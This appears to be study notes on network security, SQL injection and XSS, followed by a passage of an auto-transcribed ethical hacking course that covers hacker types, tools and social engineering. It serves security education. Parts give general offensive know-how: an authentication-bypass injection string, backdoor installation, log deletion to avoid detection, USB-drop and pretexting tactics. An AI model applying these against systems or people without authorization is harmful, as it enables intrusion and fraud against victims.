
    • Confidentiality: Ensuring that sensitive information is protected from unauthorized disclosure. Cryptography, such as encryption of data in transit (mentioned with HTTPS in and the use of VPNs with IPSec in), plays a vital role in maintaining confidentiality.
    • Integrity: Maintaining the accuracy and completeness of data, preventing unauthorized modification. Authentication Header (AH) within IPSec is responsible for data integrity.
    • Availability: Ensuring that authorized users have reliable access to network resources and data when needed. Protecting against denial-of-service (DoS) attacks (mentioned in the context of botnets in and cyber warfare in) is crucial for maintaining availability.
    • Authentication: Verifying the identity of users, devices, or applications trying to access the network. This ensures that only legitimate entities are granted entry.
    • Authorization: Defining and enforcing the level of access granted to authenticated users. This principle ensures that users only have access to the resources necessary for their roles.
    • Layering of Security (Defense in Depth): Implementing multiple security controls at different levels of the network to provide comprehensive protection. If one layer fails, others are in place to offer continued security. The sources discuss physical, technical, and administrative security layers.
    • Physical Security: Protecting physical access to network components like servers and routers.
    • Technical Security: Utilizing hardware and software-based controls such as firewalls, intrusion prevention systems (IPS), and encryption.
    • Administrative Security: Implementing policies, procedures, and user training to govern security-related behavior. Password policies and training staff for network security are examples of administrative controls.
    • Proactive Security: Identifying and mitigating vulnerabilities before they can be exploited by malicious actors. Ethical hacking and penetration testing are proactive approaches to security, where vulnerabilities are intentionally sought out and addressed.
    • Continuous Monitoring and Analysis: Regularly monitoring network traffic and security events to detect and respond to threats. Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) are tools used for this purpose. Wireshark is a tool that allows for real-time and offline network traffic analysis. Behavioral analytics can also help detect anomalies in network traffic that might indicate an attack.
    • Policy Enforcement: Establishing and consistently enforcing security policies to guide user behavior and system configurations. Ethical hackers may analyze and enhance an organization’s security policies.
    • Risk Assessment: Identifying potential threats and vulnerabilities and evaluating the potential impact they could have on the organization. Ethical hackers often perform risk assessments to prioritize vulnerabilities based on their criticality.
    • Security Awareness and Training: Educating users about security threats and best practices to minimize the risk of human error being exploited. Training staff on what is allowed and not allowed helps secure the organization.

    Key tools that support these principles include:

    • Firewalls: Act as a barrier between trusted and untrusted networks, controlling incoming and outgoing traffic based on defined rules. They can be hardware or software-based.
    • Intrusion Prevention Systems (IPS): Continuously scan networks for malicious activity and take action to block or prevent it.
    • Virtual Private Networks (VPNs): Create encrypted connections over public networks, ensuring secure transmission of sensitive data. VPNs often utilize IPSec protocols.
    • Network Scanners (e.g., Nmap): Used for network discovery, identifying open ports and services, and potential vulnerabilities.
    • Vulnerability Scanners (e.g., Nessus, Acunetix): Automatically identify known security weaknesses in systems and applications.
    • Packet Analyzers (e.g., Wireshark): Capture and analyze network traffic for troubleshooting, security analysis, and understanding communication protocols.

    By adhering to these network security principles and utilizing appropriate tools, organizations can significantly reduce their risk of falling victim to cyber threats and maintain a secure network environment.

    Web Application Vulnerabilities: SQL Injection and XSS

    Based on the sources, web applications are a significant target for security vulnerabilities because they are often accessible over the internet or internal networks and handle sensitive data. The sources highlight several key web application vulnerabilities, their exploitation, and preventative measures.

    1. SQL Injection:

    • Definition: SQL injection is a code injection technique that might exploit security vulnerabilities occurring in the database layer of an application. These vulnerabilities are present when user input is improperly filtered and is inserted into SQL statements. This allows attackers to send malicious SQL code that can be executed by the backend database.
    • Exploitation: Attackers can craft malformed SQL queries by injecting special characters (like single quotes) and SQL operators into input fields such as login forms or URL parameters. By doing so, they can bypass authentication mechanisms, retrieve sensitive data, modify database content, or even execute arbitrary commands on the database server. The demo in the source shows how injecting ‘ or 1=1 — – into a username field can bypass authentication. Attackers may also try to induce errors to understand the database structure and version, which helps in crafting more effective attacks. Tools like SQLmap are designed to automate the process of detecting and exploiting SQL injection vulnerabilities.
    • Types of SQL Injection: The source mentions different types of SQL injection:
    • In-band SQL Injection: The attacker can receive the results of their attack directly through the same communication channel used to inject the code. This includes:
    • Error-based Injection: Exploiting database error messages to gain information about the database structure.
    • Union-based Injection: Using the UNION SQL keyword to combine the results of multiple queries into a single response.
    • Blind SQL Injection: The attacker cannot see the results of their injected queries directly but can infer information based on the application’s response (e.g., different responses for true or false conditions, or time delays). This includes:
    • Boolean-based: Observing different application responses based on true or false conditions in the injected query.
    • Time-based: Injecting queries that cause a time delay in the database response to confirm successful execution.
    • Out-of-band SQL Injection: Less common, this involves the attacker relying on different channels (e.g., email, DNS requests) to receive data from the database server.
    • Prevention: The source outlines several best practices to prevent SQL injection attacks:
    • Use Prepared Statements and Parameterized Queries: These ensure that user-supplied data is treated as data and not as executable code.
    • Object Relational Mapping (ORM): ORM frameworks can help abstract database interactions and reduce the risk of direct SQL injection.
    • Escaping Inputs: Properly sanitizing user input by escaping special characters that have meaning in SQL can prevent them from being interpreted as code. However, the source cautions that not all injection attacks rely on specific characters, and not all languages have equally effective escaping functions.
    • Password Hashing: While not directly preventing SQL injection, properly hashing passwords prevents attackers from easily obtaining plaintext credentials if a database breach occurs.
    • Third-Party Authentication: Utilizing secure third-party authentication mechanisms can reduce the application’s responsibility for handling sensitive credentials.
    • Web Application Firewalls (WAFs): WAFs can be configured to identify and block malicious SQL queries before they reach the application.
    • Secure Coding Practices and Software Updates: Using secure coding practices and keeping software and libraries up to date helps patch known vulnerabilities.
    • Principle of Least Privilege: Database user accounts used by the application should have the minimum necessary privileges.

    2. Cross-Site Scripting (XSS):

    • Definition: Cross-Site Scripting (XSS) attacks involve injecting malicious scripts (most commonly JavaScript) into websites viewed by other users. This happens when a web application does not properly sanitize user input before displaying it to other users.
    • Exploitation: Attackers can inject malicious scripts through various entry points, including:
    • Input fields (e.g., search bars, comment sections, forms)
    • URL parameters
    • Even malicious advertisements
    • Fake emails containing malicious links The injected script then executes in the victim’s browser when they view the compromised page. This can allow the attacker to:
    • Steal session cookies, allowing them to impersonate the victim and gain unauthorized access to their accounts.
    • Capture keystrokes and other sensitive information.
    • Redirect the user to malicious websites.
    • Run other web browser-based exploits.
    • Display fake login forms to steal credentials. The demos in the source illustrate different types of XSS attacks and how they can be executed by injecting JavaScript code into vulnerable web application components.
    • Types of XSS Attacks: The source describes three main types of XSS attacks:
    • Reflected XSS: The malicious script is not permanently stored on the web server. Instead, it is reflected back to the user’s browser as part of the server’s response, often through malicious links or submitted forms. The attack is only effective if the user clicks the malicious link or submits the crafted form.
    • Stored XSS: The malicious script is permanently stored on the target server (e.g., in a database, message board, or comment section). The script is then executed every time a user views the page containing the malicious content, potentially affecting many users. This type is considered riskier due to its persistent nature.
    • DOM-based XSS: The vulnerability exists in the client-side JavaScript code rather than in the server-side code. The attack manipulates the Document Object Model (DOM) in the victim’s browser, causing the client-side script to execute unexpectedly. The malicious payload might be in the URL fragment (after the #) or other client-side data sources.
    • Prevention: The source provides several methods to prevent XSS attacks:
    • Input Validation and Sanitization: Always screen and validate any user input before including it in HTML output or using it in client-side scripts. Sanitize user input by removing or encoding potentially harmful characters. Validation should occur on both the client-side and server-side.
    • Avoid Displaying Untrusted User Input: If possible, avoid displaying any untrusted user input directly on web pages.
    • Proper Output Encoding/Escaping: When user input must be displayed, properly encode or escape the data based on the context in which it will be rendered (e.g., HTML encoding, JavaScript encoding, URL encoding). Different contexts require different encoding rules, and sometimes multiple layers of encoding are necessary.
    • Content Security Policy (CSP): CSP is an HTTP header that allows website owners to control the sources of content (e.g., scripts, styles, images) that the browser is allowed to load for their website. This can significantly reduce the risk of XSS attacks by preventing the browser from executing malicious scripts from untrusted sources.
    • HTTPOnly Cookie Flag: Setting the HTTPOnly flag on cookies prevents client-side scripts (like JavaScript) from accessing them. This can mitigate the impact of XSS attacks that aim to steal session cookies. However, the source notes that this relies on browser support.
    • Automated Security Testing: Use automated testing tools to scan web applications for XSS vulnerabilities before release.
    • Regular Security Audits and Updates: Regularly audit code for vulnerabilities and keep all software and libraries updated to patch known security flaws.

    Relationship to Security Testing Tools and Principles:

    • Security testing tools like Burp Suite Professional and automated vulnerability scanners like Netsparker and Acunetix (mentioned in our previous conversation) are specifically designed to help identify web application vulnerabilities like SQL injection and XSS. Ethical hackers use these tools to probe web applications, identify potential weaknesses in input handling and output rendering, and verify the effectiveness of security controls.
    • The principle of proactive security is directly addressed by identifying and mitigating web application vulnerabilities through testing and secure coding practices.
    • Input validation and sanitization and proper output encoding are crucial aspects of secure coding, aligning with the network security principle of defense in depth by implementing security at the application level.
    • Continuous monitoring can also involve analyzing web application logs for suspicious activity that might indicate an attempted or successful exploitation of a vulnerability.

    Understanding and addressing web application vulnerabilities like SQL injection and XSS is crucial for maintaining the confidentiality, integrity, and availability of web-based services and the data they handle, which are core principles of network security. The OWASP Broken Web Applications project, as mentioned in the source, provides a legal and safe environment to practice identifying and exploiting these vulnerabilities to enhance security skills.

    Ethical Hacking Full Course 2025 | Ethical Hacking Course for Beginners | Simplilearn

    hello everyone and welcome to ethical hacking full course by simply learn in today’s digital world cyber threats are everywhere making cyber security more important than ever this course will teach you the same tools and techniques ethical hackers use to protect networks application and data from cyber attacks with cyber threats increasing the demand for ethical hackers is expected to grow even more by 2025 companies across industries need skilled professionals to secure their systems offering starting salaries around $70,000 in the US and around 6 to 10 LPA in India while experienced hackers can earn over $120,000 plus or 25 lakhs perom in India so in this course you’ll get hands-on experience with ethical hacking learn how to spot vulnerabilities and strengthen security systems so whether you’re new to cyber security or looking to sharpen your skills this course is your pathway to a high demand and well-paying career in ethical hacking but before we commence if you’re interested in stepping one of the most in demand fields in 2025 the advanced executive program in cyber security by simply learn is your perfect opportunity in just 6 months you’ll gain expertise in ethical hacking penetration testing ransomware analysis and advanced defense strategies through a hands-on industry relevant approach this program is offered in collaboration with Triple IT Bangalore and IBM features live interactive classes real world projects and industry recognized certifications so hurry up and enroll now find the course link description box below and in the pin comments data is the new gold imagine how much data is generated by just your smartphone every single day be it the pictures you click or the messages you send nearly 41 million messages are sent worldwide via WhatsApp every single minute so safeguarding your personal data against hackers has now become a top priority did you know that India leads the world when it comes to ethical hackers with 23% of the worldwide hacking population from India the top ethical hackers earn more than twice of what software engineers in India do but what makes ethical hacking such a demanding industry ethical hacking is the process of taking security measures to safeguard data and networks from malicious cyber attacks the hackers use every tool at their disposal to try and breach the security barrier and find any potential vulnerabilities the ethical ineth ethical hacking denotes the lack of malicious intent since these sessions are often permitted by the system owner or the network that is being hacked into to fix any compromised entry points before blackhead hackers discover and exploit them so what is a blackhead hacker you may ask a hacker who exploits security vulnerabilities for monetary gains like stealing or destroying private data altering disrupting or shutting down websites and networks is known as a blackhead hacker on the other end of the spectrum we have whitehead hackers who help people secure the networks by stress testing their platform against the most dangerous of cyber attacks that is with their consent of course but the most neutral of the bunch are greyhead hackers who may not ask for consent before snooping on a foreign system but they do inform the owner if they find any vulnerabilities sometimes in exchange for a small fee the security breaches have become less and less prevalent thanks to rigorous ethical hacking campaigns and corporate awareness programs the ability to fix critical security issues before black hat hackers leverage them has saved organizations billions of dollars google IBM Microsoft and virtually every major corporation are looking to protect the data so it shouldn’t come as a surprise that the ethical hacking and information security job market is set to rise by nearly 28% by 2026 with salaries going as high as $225,000 perom so that’s ethical hacking wrapped up in 2 minutes to catch more byite-size and detailed videos on different technologies subscribe to Simple Learn and stay updated scammers targeting institutions such as hospitals schools and government offices for ransom pocketed $1.1 billion last year compared with 567 million in 2022 cyber security experts act as a multi-level line of defense against cyber attacks through all internet activity securing individuals corporate giants tech multinational companies international agencies and even governments hence this extremely critical role demands a great pay and the demand for it continues to grow year after year with beginner level salaries averaging around $75,000 with years of experience it can go to above $200,000 for chief information officer level roles due to the extremely critical nature of this job role there is a demand across all verticals including defense healthcare banking tech and even education sector if you want to become a cyber security engineer in 2024 here is how you can jumpstart your career in this field we will split the entire learning path in three major sections beginning with core concepts level topics then we will move on to intermediate skill-based topics and eventually we will discuss what topics to learn in niche cyber security skills let us start with core concept level topics start with getting a thorough introduction to cyber security make sure to learn the basics of cyber security including all the important terminology types of threats how these threats work and what are the working principles in cyber security from there you can move on to mastering networking fundamentals this is an absolute must know to enter the field of cyber security you need to be thorough with how the internet works how the data highway functions right from the function of operating systems to understanding of TCPIP OC model routing and switching every single one of these concepts are critically important make sure to keep these skills handy at all times since they help in understanding the overarching concepts easily but it’s not just the networking part of operating systems that you need to know this is where the next important part comes into the picture operating systems proficiency in Windows Linux and possibly Macos operating systems allows you to work across all domains being adept in each of these helps you become better at safeguarding the fault lines across them this is critical for your day-to-day working since you will be directly iterating with these to perform your daily tasks it is not unknown that mathematics and computer science go hand in hand this extends to the field of cyber security too you need to learn cryptography where the knowledge of encryption decryption cryptographic algorithms and protocols is very important next up is risk management understanding risk assessment mitigation strategies and compliance frameworks like GDPR and HIPPA finally you should also understand cyber security laws and ethics awareness of legal and ethical considerations in cyber security let us now move on to two intermediate level skill and toolsbased topics security technologies familiarity with firewalls intrusion detection prevention systems antivirus software and endpoint security vulnerability assessment and penetration testing hands-on experience with tools like Nessus Metas-ploit NMAP and Burp Suite security operations incident response threat hunting log analysis and security information and event management secure coding practices knowledge of secure software development practices and common vulnerabilities like OASP top 10 cloud security understanding of cloud computing security principles and best practices including Oz Azure and Google Cloud Platform mobile security knowledge of mobile application security testing and best practices for securing mobile devices now that you have mastered core concepts and intermediate skills and tools based on your interest you can move on and choose one of the niche fields for learning niche cyber security skills industrial control systems security understanding of Scottis systems PLCS and protocols like Modbus and DNP3 app security knowledge of securing internet of things devices and protocols blockchain security understanding of blockchain technology and its security implications thread intelligence gathering analyzing and leveraging threat intelligence to enhance cyber security posture reverse engineering skill in analyzing malware and understanding its behavior red team blue team exercises participating in simulated attacks red team and defending against them blue team with that said we have reached towards the end of our video this learning path covers a broad range of topics and skills necessary for a cyber security engineer in 2024 starting from foundational concepts to specialized areas within the field you must make sure to stay updated and keep on aligning this learning path based on your requirements if you have any questions about this learning path or cyber security in general that needs to be answered make sure to let us know in the comment section below and we would be happy to help let’s understand what are the types of hackers so what are the types of hackers hacker is a technically skilled person uh who is very adept with computers they have good programming skills they understand how operating system works they understand how networks work they understand how to identify flaws and vulnerabilities within all of these aspects and then they understand and know how to misuse these flaws to get a outcome which would be detrimental to the health of the organization so there are six type of hackers that have been identified black hat hackers white hat hackers grey hat script kitties nation sponsored hackers and a hackists so blackey hackers are bas basically uh the malicious hackers who have malicious intent and have criminalistic tendencies they want to harm the organization by hacking into their infrastructure by destroying their infrastructure by destroying their data so that uh they can gain from it from a monetary perspective uh these guys are also known as crackers the main aspect of these uh people are that they have malicious intent they try to do unauthorized activities and they try it for personal gain another important aspect to remember is that a blackhat hacker will always try to hide their identity uh they will spoof their online digital identity by masking it by spoofing their IP addresses MAC addresses and try to remain anonymous on the network a white hat hacker on the other hand is also an ethical hacker or a security analyst who’s an individual who will do exactly the same thing that a black hat hacker would do minus the malicious intent plus the intent of helping the organization identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities so they are authorized to act on the company’s behalf they are authorized to do that activity which would help the company identify those flaws and thus help the company mitigate those flaws improving on their security posture so these uh these kind of security experts or ethical hackers would help organizations defend themselves against unauthorized attacks greyhead hackers is a blend of both white hat and black hat hackers so here they can work defensively and offensively both they can accept contracts from organizations to increase their security posture at the same time they can also get themselves involved in malicious activities towards other organizations to personally gain or benefit from them by doing unauthorized activity script kitties are people uh who are technically not much aware about what hacking is uh they rely on existing tools that have been created by other hackers they have no technical knowledge of what they’re doing it’s just a hit or miss for them so they just get their hands on a tool they try to execute those tools uh if the hack works it works otherwise it doesn’t so these people are basically who are noobs or newbies who are trying to learn hacking or uh just uh people who with malice’s intent who just want to have some fun or trying to impress people around then we have the nation or the state sponsored hackers as the name suggests these hackers are sponsored by their government now this may not be a legitimate job but most of the governments do have uh hackers uh enrolled in their pay on um on their uh organizations to spy on their enemies to spy on various countries and try to figure out uh the aspirations of those countries so this is basically a spying activity where you are technically trying to get access to other count’s resources and then try to spy on them to figure out what their activities have been or what their future plans have been and then we have the activists who is an individual who has a political agenda to promote and they promote it by doing hacking so uh these guys what is the difference between a black hat hacker and a activist the black hat hacker may try to hide their identity activist will claim responsibility of what they have done so for them it’s a political agenda a political cause and they will try to hack various organizations to promote their cause they would probably do this by defacing the website and posting the messages that they want to promote on these websites so what exactly is ethical hacking then we have discussed the types of hackers we have identified a malicious hacker as a black hat hacker with the intent uh of doing harm to an organization’s network for personal gain we have discussed what the ethical hacker is so an ethical hacker would be doing the same activity but in an authorized manner so they would have legal contracts that they would be signing with the organization which would give them a definite scope of what they’re allowed to do and what they are not allowed to do and the ethical hackers would function within those scopes would try to execute those test scenarios where they would be able to identify those flaws or those system vulnerabilities and then they would be submitting a report to the management of what they have found they would also help the management to mitigate or to resolve those weaknesses so that nobody else can misuse them later on they might use the same techniques and the same tools that blackhead hackers do however the main difference here is that these guys are authorized to do that particular activity they’re doing it in a controlled manner with the intent of helping the organization and not with the intent of personal gains so who’s an ethical hacker again an ethical hacker is a highly intelligent highly educated person who knows how computers function how programming languages work how operating systems work they can troubleshoot they’re technically very adept at computing they understand the architecture they understand uh how various components in a computer work they can troubleshoot those components and they can basically be uh very good with programming as well now when I say programming we don’t want the ethical hacker to be a good developer of applications we want them to understand programming in such a way that they can create scripts they can write their own short programs like viruses worms trojans or exploits which would help them achieve the objective that they have set out for so uh here you can see the ethical hacker they are individuals who perform a security assessment of their companies with the permission of cons concerned authorities so what is a security assessment a security assessment is finding out the exact security posture of the organization by identifying what security controls are in place how they’ve been configured and if there are any gaps in the configurations themselves so an organization will hire a ethical hacker they they would give the ethical hacker the information about what information is or what security controls what firewalls what IDs IPSS introen detection or introen prevention systems antiviruses are already in place and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization what is the need of an ethical hacker the need of an ethical hacker is proactive security the ethical hacker would identify all the existing flaws in an organization and try to resolve those flaws to help secure the organization from blackhead hackers so ethical hackers would prevent hackers from cracking into an organization’s network by securing the organization by improving on their security on a periodic basis and they would also try to identify system vulnerabilities network vulnerabilities or application level vulnerabilities that would have been missed or have already been missed and then try to figure out a way of plugging them or uh resolving them so that they cannot be misused by other hackers they would also analyze and enhance an organization security policies now what are policies policies are basically documents that have been created by an organization of rules that all the employees need to follow to ensure that the security of an organization is maintained for example a password policy a password policy would help users in an organization to adhere to the standards the organization has identified for a password complexity for example a password when a user is creating them should adhere to standards where they are using random words they are uh they contain the alphabet A through zed uppercase and lowerase 0 through 9 as numeric and special characters and they’re randomized so that the password becomes more more stronger to prevent from brute force attacks so what would an ethical hacker do at this point in time they would try to test the strength of the passwords to see if brute force attacks or dictionary attacks are possible and if any of these passwords can be cracked they would ensure that all the employees are following the policies and all the passwords are are as secured as the policies want them to be if there are any gaps in the policies or the implementation of the policy it is the ethical hacker’s responsibility to identify those gaps and warn the organization about it similarly they would also try to protect any personal information any data that is owned by the organization that is critical for the functioning of the organization and they’ll try to protect it by from falling into the hacker’s hands now what are the skills that are required of an ethical hacker these are the following skills so first and foremost they should have good knowledge with operating systems such as Windows Linux Unix and Mac now when we say knowledge about operating systems it’s not only about how to use those operating systems but how to troubleshoot those operating systems how these operating systems work how these operating systems need to be configured how can they be secured for example securing an operating system is not only installing a firewall and an antivirus but you need to configure permissions on an operating system of what users are allowed to do and what users are not allowed to do for example limiting the installation of applications how are we going to do that we need to go into the system center the security center of Windows and we need to configure security parameters over there of what are acceptable softwares and what are not same with Linux and uh Mac softwares operating systems so we need to know how we can secure these operating systems similarly all of these would have desktop versions and server versions of operating systems as a ethical hacker we need to know the desktop and server versions both how to configure them and how to provide services within the organization on these servers so that they can be consumed in a secure manner by all the employees at the same time they should also be knowledgeable of programming languages or scripting languages such as PHP Python Ruby HTML for programming if you will because web servers come into the picture so again they should not be great developers where they can create huge applications but they should be able to develop scripts understand those scripts analyze those scripts and figure out what the output should be of those scripts to achieve the hacking goals that they have set out for an ethical hacker should have a very good understanding about networking no matter whether you’re in application security you’re in network security or you’re in hostbased security since a computer will always be connected to a network either a local area network like a LAN or the internet we should know how networking works we should know the seven layers of the OSI model we should know which protocols work on those seven layers we should identify the TCP IP model and how OSI model can be mapped to the TCP IP model we should understand how TCP and UDP work how uh how each and every protocol is crafted how they are supposed to behave for us to analyze and understand any network-based attacks we should be very good in security measures so we should know where those vulnerabilities would lie what are the latest exploits available in the market and we should be able to identify them we should be able to know the techniques and the tools of how to deal with security how to analyze security and then how to implement security to enhance it as well along with that it is important that a security analyst or ethical hacker is aware of the local security laws and standards why is that because an organization cannot do any illegal activity whatever responses that they have whatever security mechanisms whatever security controls they will implement they need to be adhering to the local law of the land they should be legal in nature and should not cause undue harm to any of the employees or any of the third party clients that they are dealing with so the ethical hackers should be aware of what uh security laws are before they implement security controls or even before they start testing for security controls and all of these should be backed up by having a global certification or a globally valid certification related to networking related to security ethical hacking the law of the land anything and everything maybe even programming uh it’s good to have a certification in PHP Pearl Python Ruby and so on so forth why because most of the organizations when they hire ethical hackers look out for these certifications especially globally valid certifications so that they can be sure or they can be assured that the person that they are hiring has the required skill set so let’s talk about a few of the tools that a ethical hacker would utilize uh in their testing scenarios to be honest there are hundreds of tools out there what you see on the screen are just a few examples of them uh Nessus is a vulnerability scanner what is a vulnerability scanner it is an automated tool that is designed to identify vulnerabilities within hosts within uh operating systems within networks so they come with their readymade databases of all the vulnerabilities that have already been identified and they scan the network against that database to find out any possible flaws or any possible vulnerabilities that currently exist on the host or the operating system or on the network similarly there would be application scanners like uh Aunetics or Arachnne that would help you scan applications and identify flaws within those applications as well now all of these are automated tools the essence of ethical hacker is when these tools churn out the reports the ethical hack hacker can understand these reports analyze them identify the flaws and then craft their own exploits or use existing exploits in a particular manner so that they can get access or they can bypass the access security controls mechanisms that are already in place how can they do that with the tool called metas-loit you see that big M there on the right hand side that M logo is for a tool called metas-loit which is a penetration testing tool what is a penetration testing tool it is that tool that will allow a ethical hacker to craft their exploits or choose their exploits for the vulnerabilities that have been identified by Nessus since we are interacting with computers we will always be interacting using tools right so the first tool Nessus identifies the flaws and the possible list of vulnerabilities we do a penetration test using metasloit to validate those flaws and to verify that those flaws actually exist and try to figure out the complexity of those flaws and that’s where metasloit helps us do that wireshark would be used in the background while we are doing both the activities using Nessus or Metasloit to keep a track of what packets are being sent and by received on the network which will help us analyze those packets so whenever I run a Nessus scanner I would run a wireshark in the background it will capture the data packets and I can go through those data packets and analyze that data packets to identify what Nessus is actually trying to do similarly when I try to attack a machine using exploit on metas-ploit I will keep on wireshark running in the background to capture the data packets that have been sent and the responses that I’ve received from the victim so that I can also go through those packets and analyze the responses and analyze the attack whether it was successful to what extent was it successful and basically will also give me a validation a proof of the activity that has happened n MAP is another automated tool that allows me to scan for open ports and protocols so why would I use N MAPAP because pro ports and protocols become an entry point for a hacker to gain access to devices for example when we connect to a web server we connect through a web browser but we automatically connect to port 80 using HTTP and port 443 is using HTTPS so if I’m connecting to a web server using HTTPS it is safe to assume that port 443 on the web server is open to accept those connections similarly there would be other services that may be left open on the web server because nobody thought about configuring it or they misconfigured the web server and they left unwanted services running so end mapap will allow me to scan those ports and services and allow me to understand what services are being offered on that server so then I can start analyzing that server identify those flaws within those services and then try to attack them if the application that I’m analyzing is connected to a database and I want to do a SQL injection attack or if I if Nessus tells me that there is a SQL injection attack that may be possible on that particular application I can use an automated tool called SQL map or SQL map that would allow me to automatically craft all the queries that are required for a SQL injection attack and help me do that attack at the same time so here I do not have to manually create my own queries uh the SQL map tool would automatically create them for me what I would do is I would use Nessus to identify that particular flaw if Nessus reports that flaw I would then go use the tool SQL map configure it to attack that particular web server and when I fire off the tool it will then automatically start directing queries SQL injection queries to the database to see if those uh databases are vulnerable and if yes what data can be retrieved from those databases so all of these tools in a nutshell would help me hack networks applications operating systems and host devices and this is what the ethical hacker does they use these kind of tool sets they identify what attacks they need to do they identify the right tool for that particular attack and they write their exploits they create those attacks and then they start attacking analyze the response and then give a report to the management uh providing them feedback about how the attack was created or crafted what was the response to that attack and whether the attack was successful or not if successful they would also give recommendations of what to do to prevent these attacks from happening in the future so when we are doing these attacks or when we want to launch these attacks what is the process that we would follow so there are six steps that we would do as a ethical hacker if you’re just a hacker you probably wouldn’t do the sixth step which is a reporting step so the first step that would be done is the reconnaissance phase which is the information gathering phase which is very important from ethical hackers perspective or a hacker’s perspective because if I want to attack someone or something as a digital device I need to know what I’m attacking i need to know the IP address of the device the MAC address of those devices i need to know the operating system the build or the version of that operating systems applications on top the versions of those applications so I know what I’m attacking for example if I if I want to attack a server I assume it’s a Windowsbased server and I use a particular tool to attack it but it actually turns out to be a Linux based server my attacks are going to be unsuccessful so I need to focus my attack based on what is there at the other end so in my information gathering phase I want to identify all of that information once I have that information done I’m going to scan those servers using tools like end mapap that we just talked about and we’re going to try to see the open ports open services and protocols that are running on that server that can give me possible entry points within the network or within the device or within the operating system at the same time along with the scanning with end mapap I would run a vulnerability scanner the necess vulnerability scanner we talked about or aetics for applications and then I would try to identify vulnerabilities in those applications operating systems or networks once I have identified those vulnerabilities in the scanning phase I would then move on to the gaining phase where I would then craft my exploits or choose existing exploits and start attacking the attacking the victim at this point in time if my attack is successful I will probably have gained access uh by either cracking passwords or escalating privileges or exploiting a vulnerability that I may have found during the scanning phase once I have gained my access I want to maintain my access why because the vulnerability may not be there for long maybe somebody updated the operating system and hence the flaw was no longer exist existing or somebody changed the password that may I may have cracked thus I no longer have access so what do I do to maintain my access i install Trojans or backdoor entries to those systems using which I can secretly in a covert manner get access to those devices at my own will at my own time as long as those devices are available over the network so that’s where I maintain my access i have hacked them now I want to maintain my access so I install a software which would give me a backdoor entry to that device no matter what once I have done this I want to clear my track so whatever activity that I’ve been doing for example installing a Trojan a Trojan is also a software that would create directory directories and files once installed on the victim’s machine so I want to hide that if I have access data stores if I have modified data I want to hide that activity because if the victim comes to know that something has happened they would start they would start increasing their security parameters they might start scanning their devices they may take them offline thus my hack would no longer be efficient the reason I’m clearing my tracks is that the victim doesn’t find out that they have been hacked or they have been compromised or even if they do find out that they’ve been compromised they cannot trace the compromise back to me so I would be deleting references of any of the IP addresses or MAC addresses that I may have used to attack that particular device and this is where I will be able to identify where those logs were created where those traces are once I take off those traces the victim would not be any wiser of whether they have been compromised or who compromised their system and if I am successful at all of these stages or what to whatever extent the success that I’ve achieved in any of these stages I would then create a report based on that and I would report to the management about the activities that we have been able to do and whatever we have been able to achieve out of those activities for example we identified 10 different flaws there were 20 different attacks that we wanted to do what attack did we do what was the outcome of that attack what was the intended or or the expected output of that attack i’ll create a report which would give a detailed analysis of all the steps that were taken along with screenshots and evidences of what activity was conducted what was the output what was the expected output and I would submit that report to the management giving them an idea of what vulnerabilities and flaws exist in their environment or their devices that need to be mitigated so that the security can be enhanced so these are the six steps that the ethical hacking process would take uh just going through this the uh reconnaissance is where you’re going to use hiking tools like NM map edge ping to obtain information about targets there are hundreds of tools out there depending on what information you want then in scanning again N mapose these kind of tools to be utilized to identify open ports protocols and services in gaining access you’re going to exploit a vulnerability by using the metasloit tool that we talked about in the previous slides in the maintaining access you’re going to install back doors you can use metasloit at the same time uh you can craft your own scripts to create a Trojan and install it on the victim’s machine once you have achieved that clearing tracks is where you’re going to clear all evidences of your activity so that you do not get caught or the victim doesn’t even realize that they have been hacked and once you have done all of this we are going to create reports that are going to be submitted to the management to help them understand the current security evaluation of their organization so now let’s see how we can hack using social engineering now what is social engineering social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed so this is where your social skill and your people skills come into the picture if you’re able to communicate effectively to another person they would probably give up more information that they intended to give out let’s look at look at examples right if you see on the screen fishing activity what is fishing we receive a lot of free emails on a regular basis we have always received those emails where we have won a lottery of a few million dollars but we have never realized that we didn’t purchase a lottery to win a lottery in the first place we have always had those Nigerian frauds where a prince died in some South African country and you out of 7 billion people on the planet have been identified where they want to transfer a few hundred million through your account and they want to give you 50% of that money in return as thank you some very basic attacks where you go on two websites and there’s a banner flashing at you saying “Congratulations you’re the 1 millionth visitor to this website click here to claim your prize.” All of these are social engineering attacks fishing attacks fake websites fake communications being sent out to users to prey on their gullibility most of humans always have that dream of striking it rich winning a huge lottery once and for all and living their life lavishly ever after but sadly in the real world that’s not that doesn’t happen that often and if you’re receiving those mails it is very important that you first research the validity of those those communications before you even want to act upon them so why are humans susceptible to social engineering because humans have emotion machines do not try pleading with a machine to give you access to a account that you have forgotten a password to the machine wouldn’t even know what you’re doing try pleading with a human sympathy or empathy where you could try to create a social engine injuring attack where you can plead with them saying if I do not get access to this account immediately I might lose my job and then that would put my family into problems somebody would feel empathy or sympathy towards you and help you reset that password and give you access to that account it’s how good the attack is and how convincing you are for the success of this attack to happen so what is a familiarity exploit attackers interact with victims to gain information which will benefit the attack uh to crack credentials as passwords if we want to reset our passwords what do we have as a mechanism to resetting passwords we have some security questions that we set up those questions are nothing but personal information that we would know but through a social engineering attack we it would be easily be able to uh gather the information that you have set for your security questions the security questions can be as simple as the first school that you attended you probably have that listed on your LinkedIn profile where a per person can just go in there and see your academic qualifications and identify the school that you were in right similarly it might also be a question what was your mother’s maiden name that’s a very good attack and that’s uh I mean if a person can interact with you let’s say they’re trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing and they ask you these questions you wouldn’t think twice before giving those answers as long as the request sounds legitimate to us we are able to justify that request we do answer those queries so it’s upon us to verify the authenticity of the request coming in before we answer it fishing as discussed would be fraudulent emails which appear to be coming from a trusted source so email spoofing comes into mind fake websites and so on so forth exploiting human curiosity curiosity killed the cat right so there was there’s so many physical attacks where hackers just keep pen drives lying around in a parking lot now this is a open generic attack whoever falls victim will fall victim so if I just throw around a few USBs in the parking lot obviously with Trojans implemented on them some people who are curious or who are looking for a couple of freebies might take up those pen drives plug them in their computers to see what data is on the pen drives at the same time once they plug in there those pen drives on their computers the virus or the Trojan would get infected and cause harm to their machine then exploiting human greed we just talked about the Nigerian frauds and the lotteryies those kind of attacks the fake money-making gimmicks now basically this is where you prey upon the person’s uh greed kicking in and they clicking on those links in order to uh get that money that has been promised to them in that email so one of the safest mechanism to keep data private and to keep 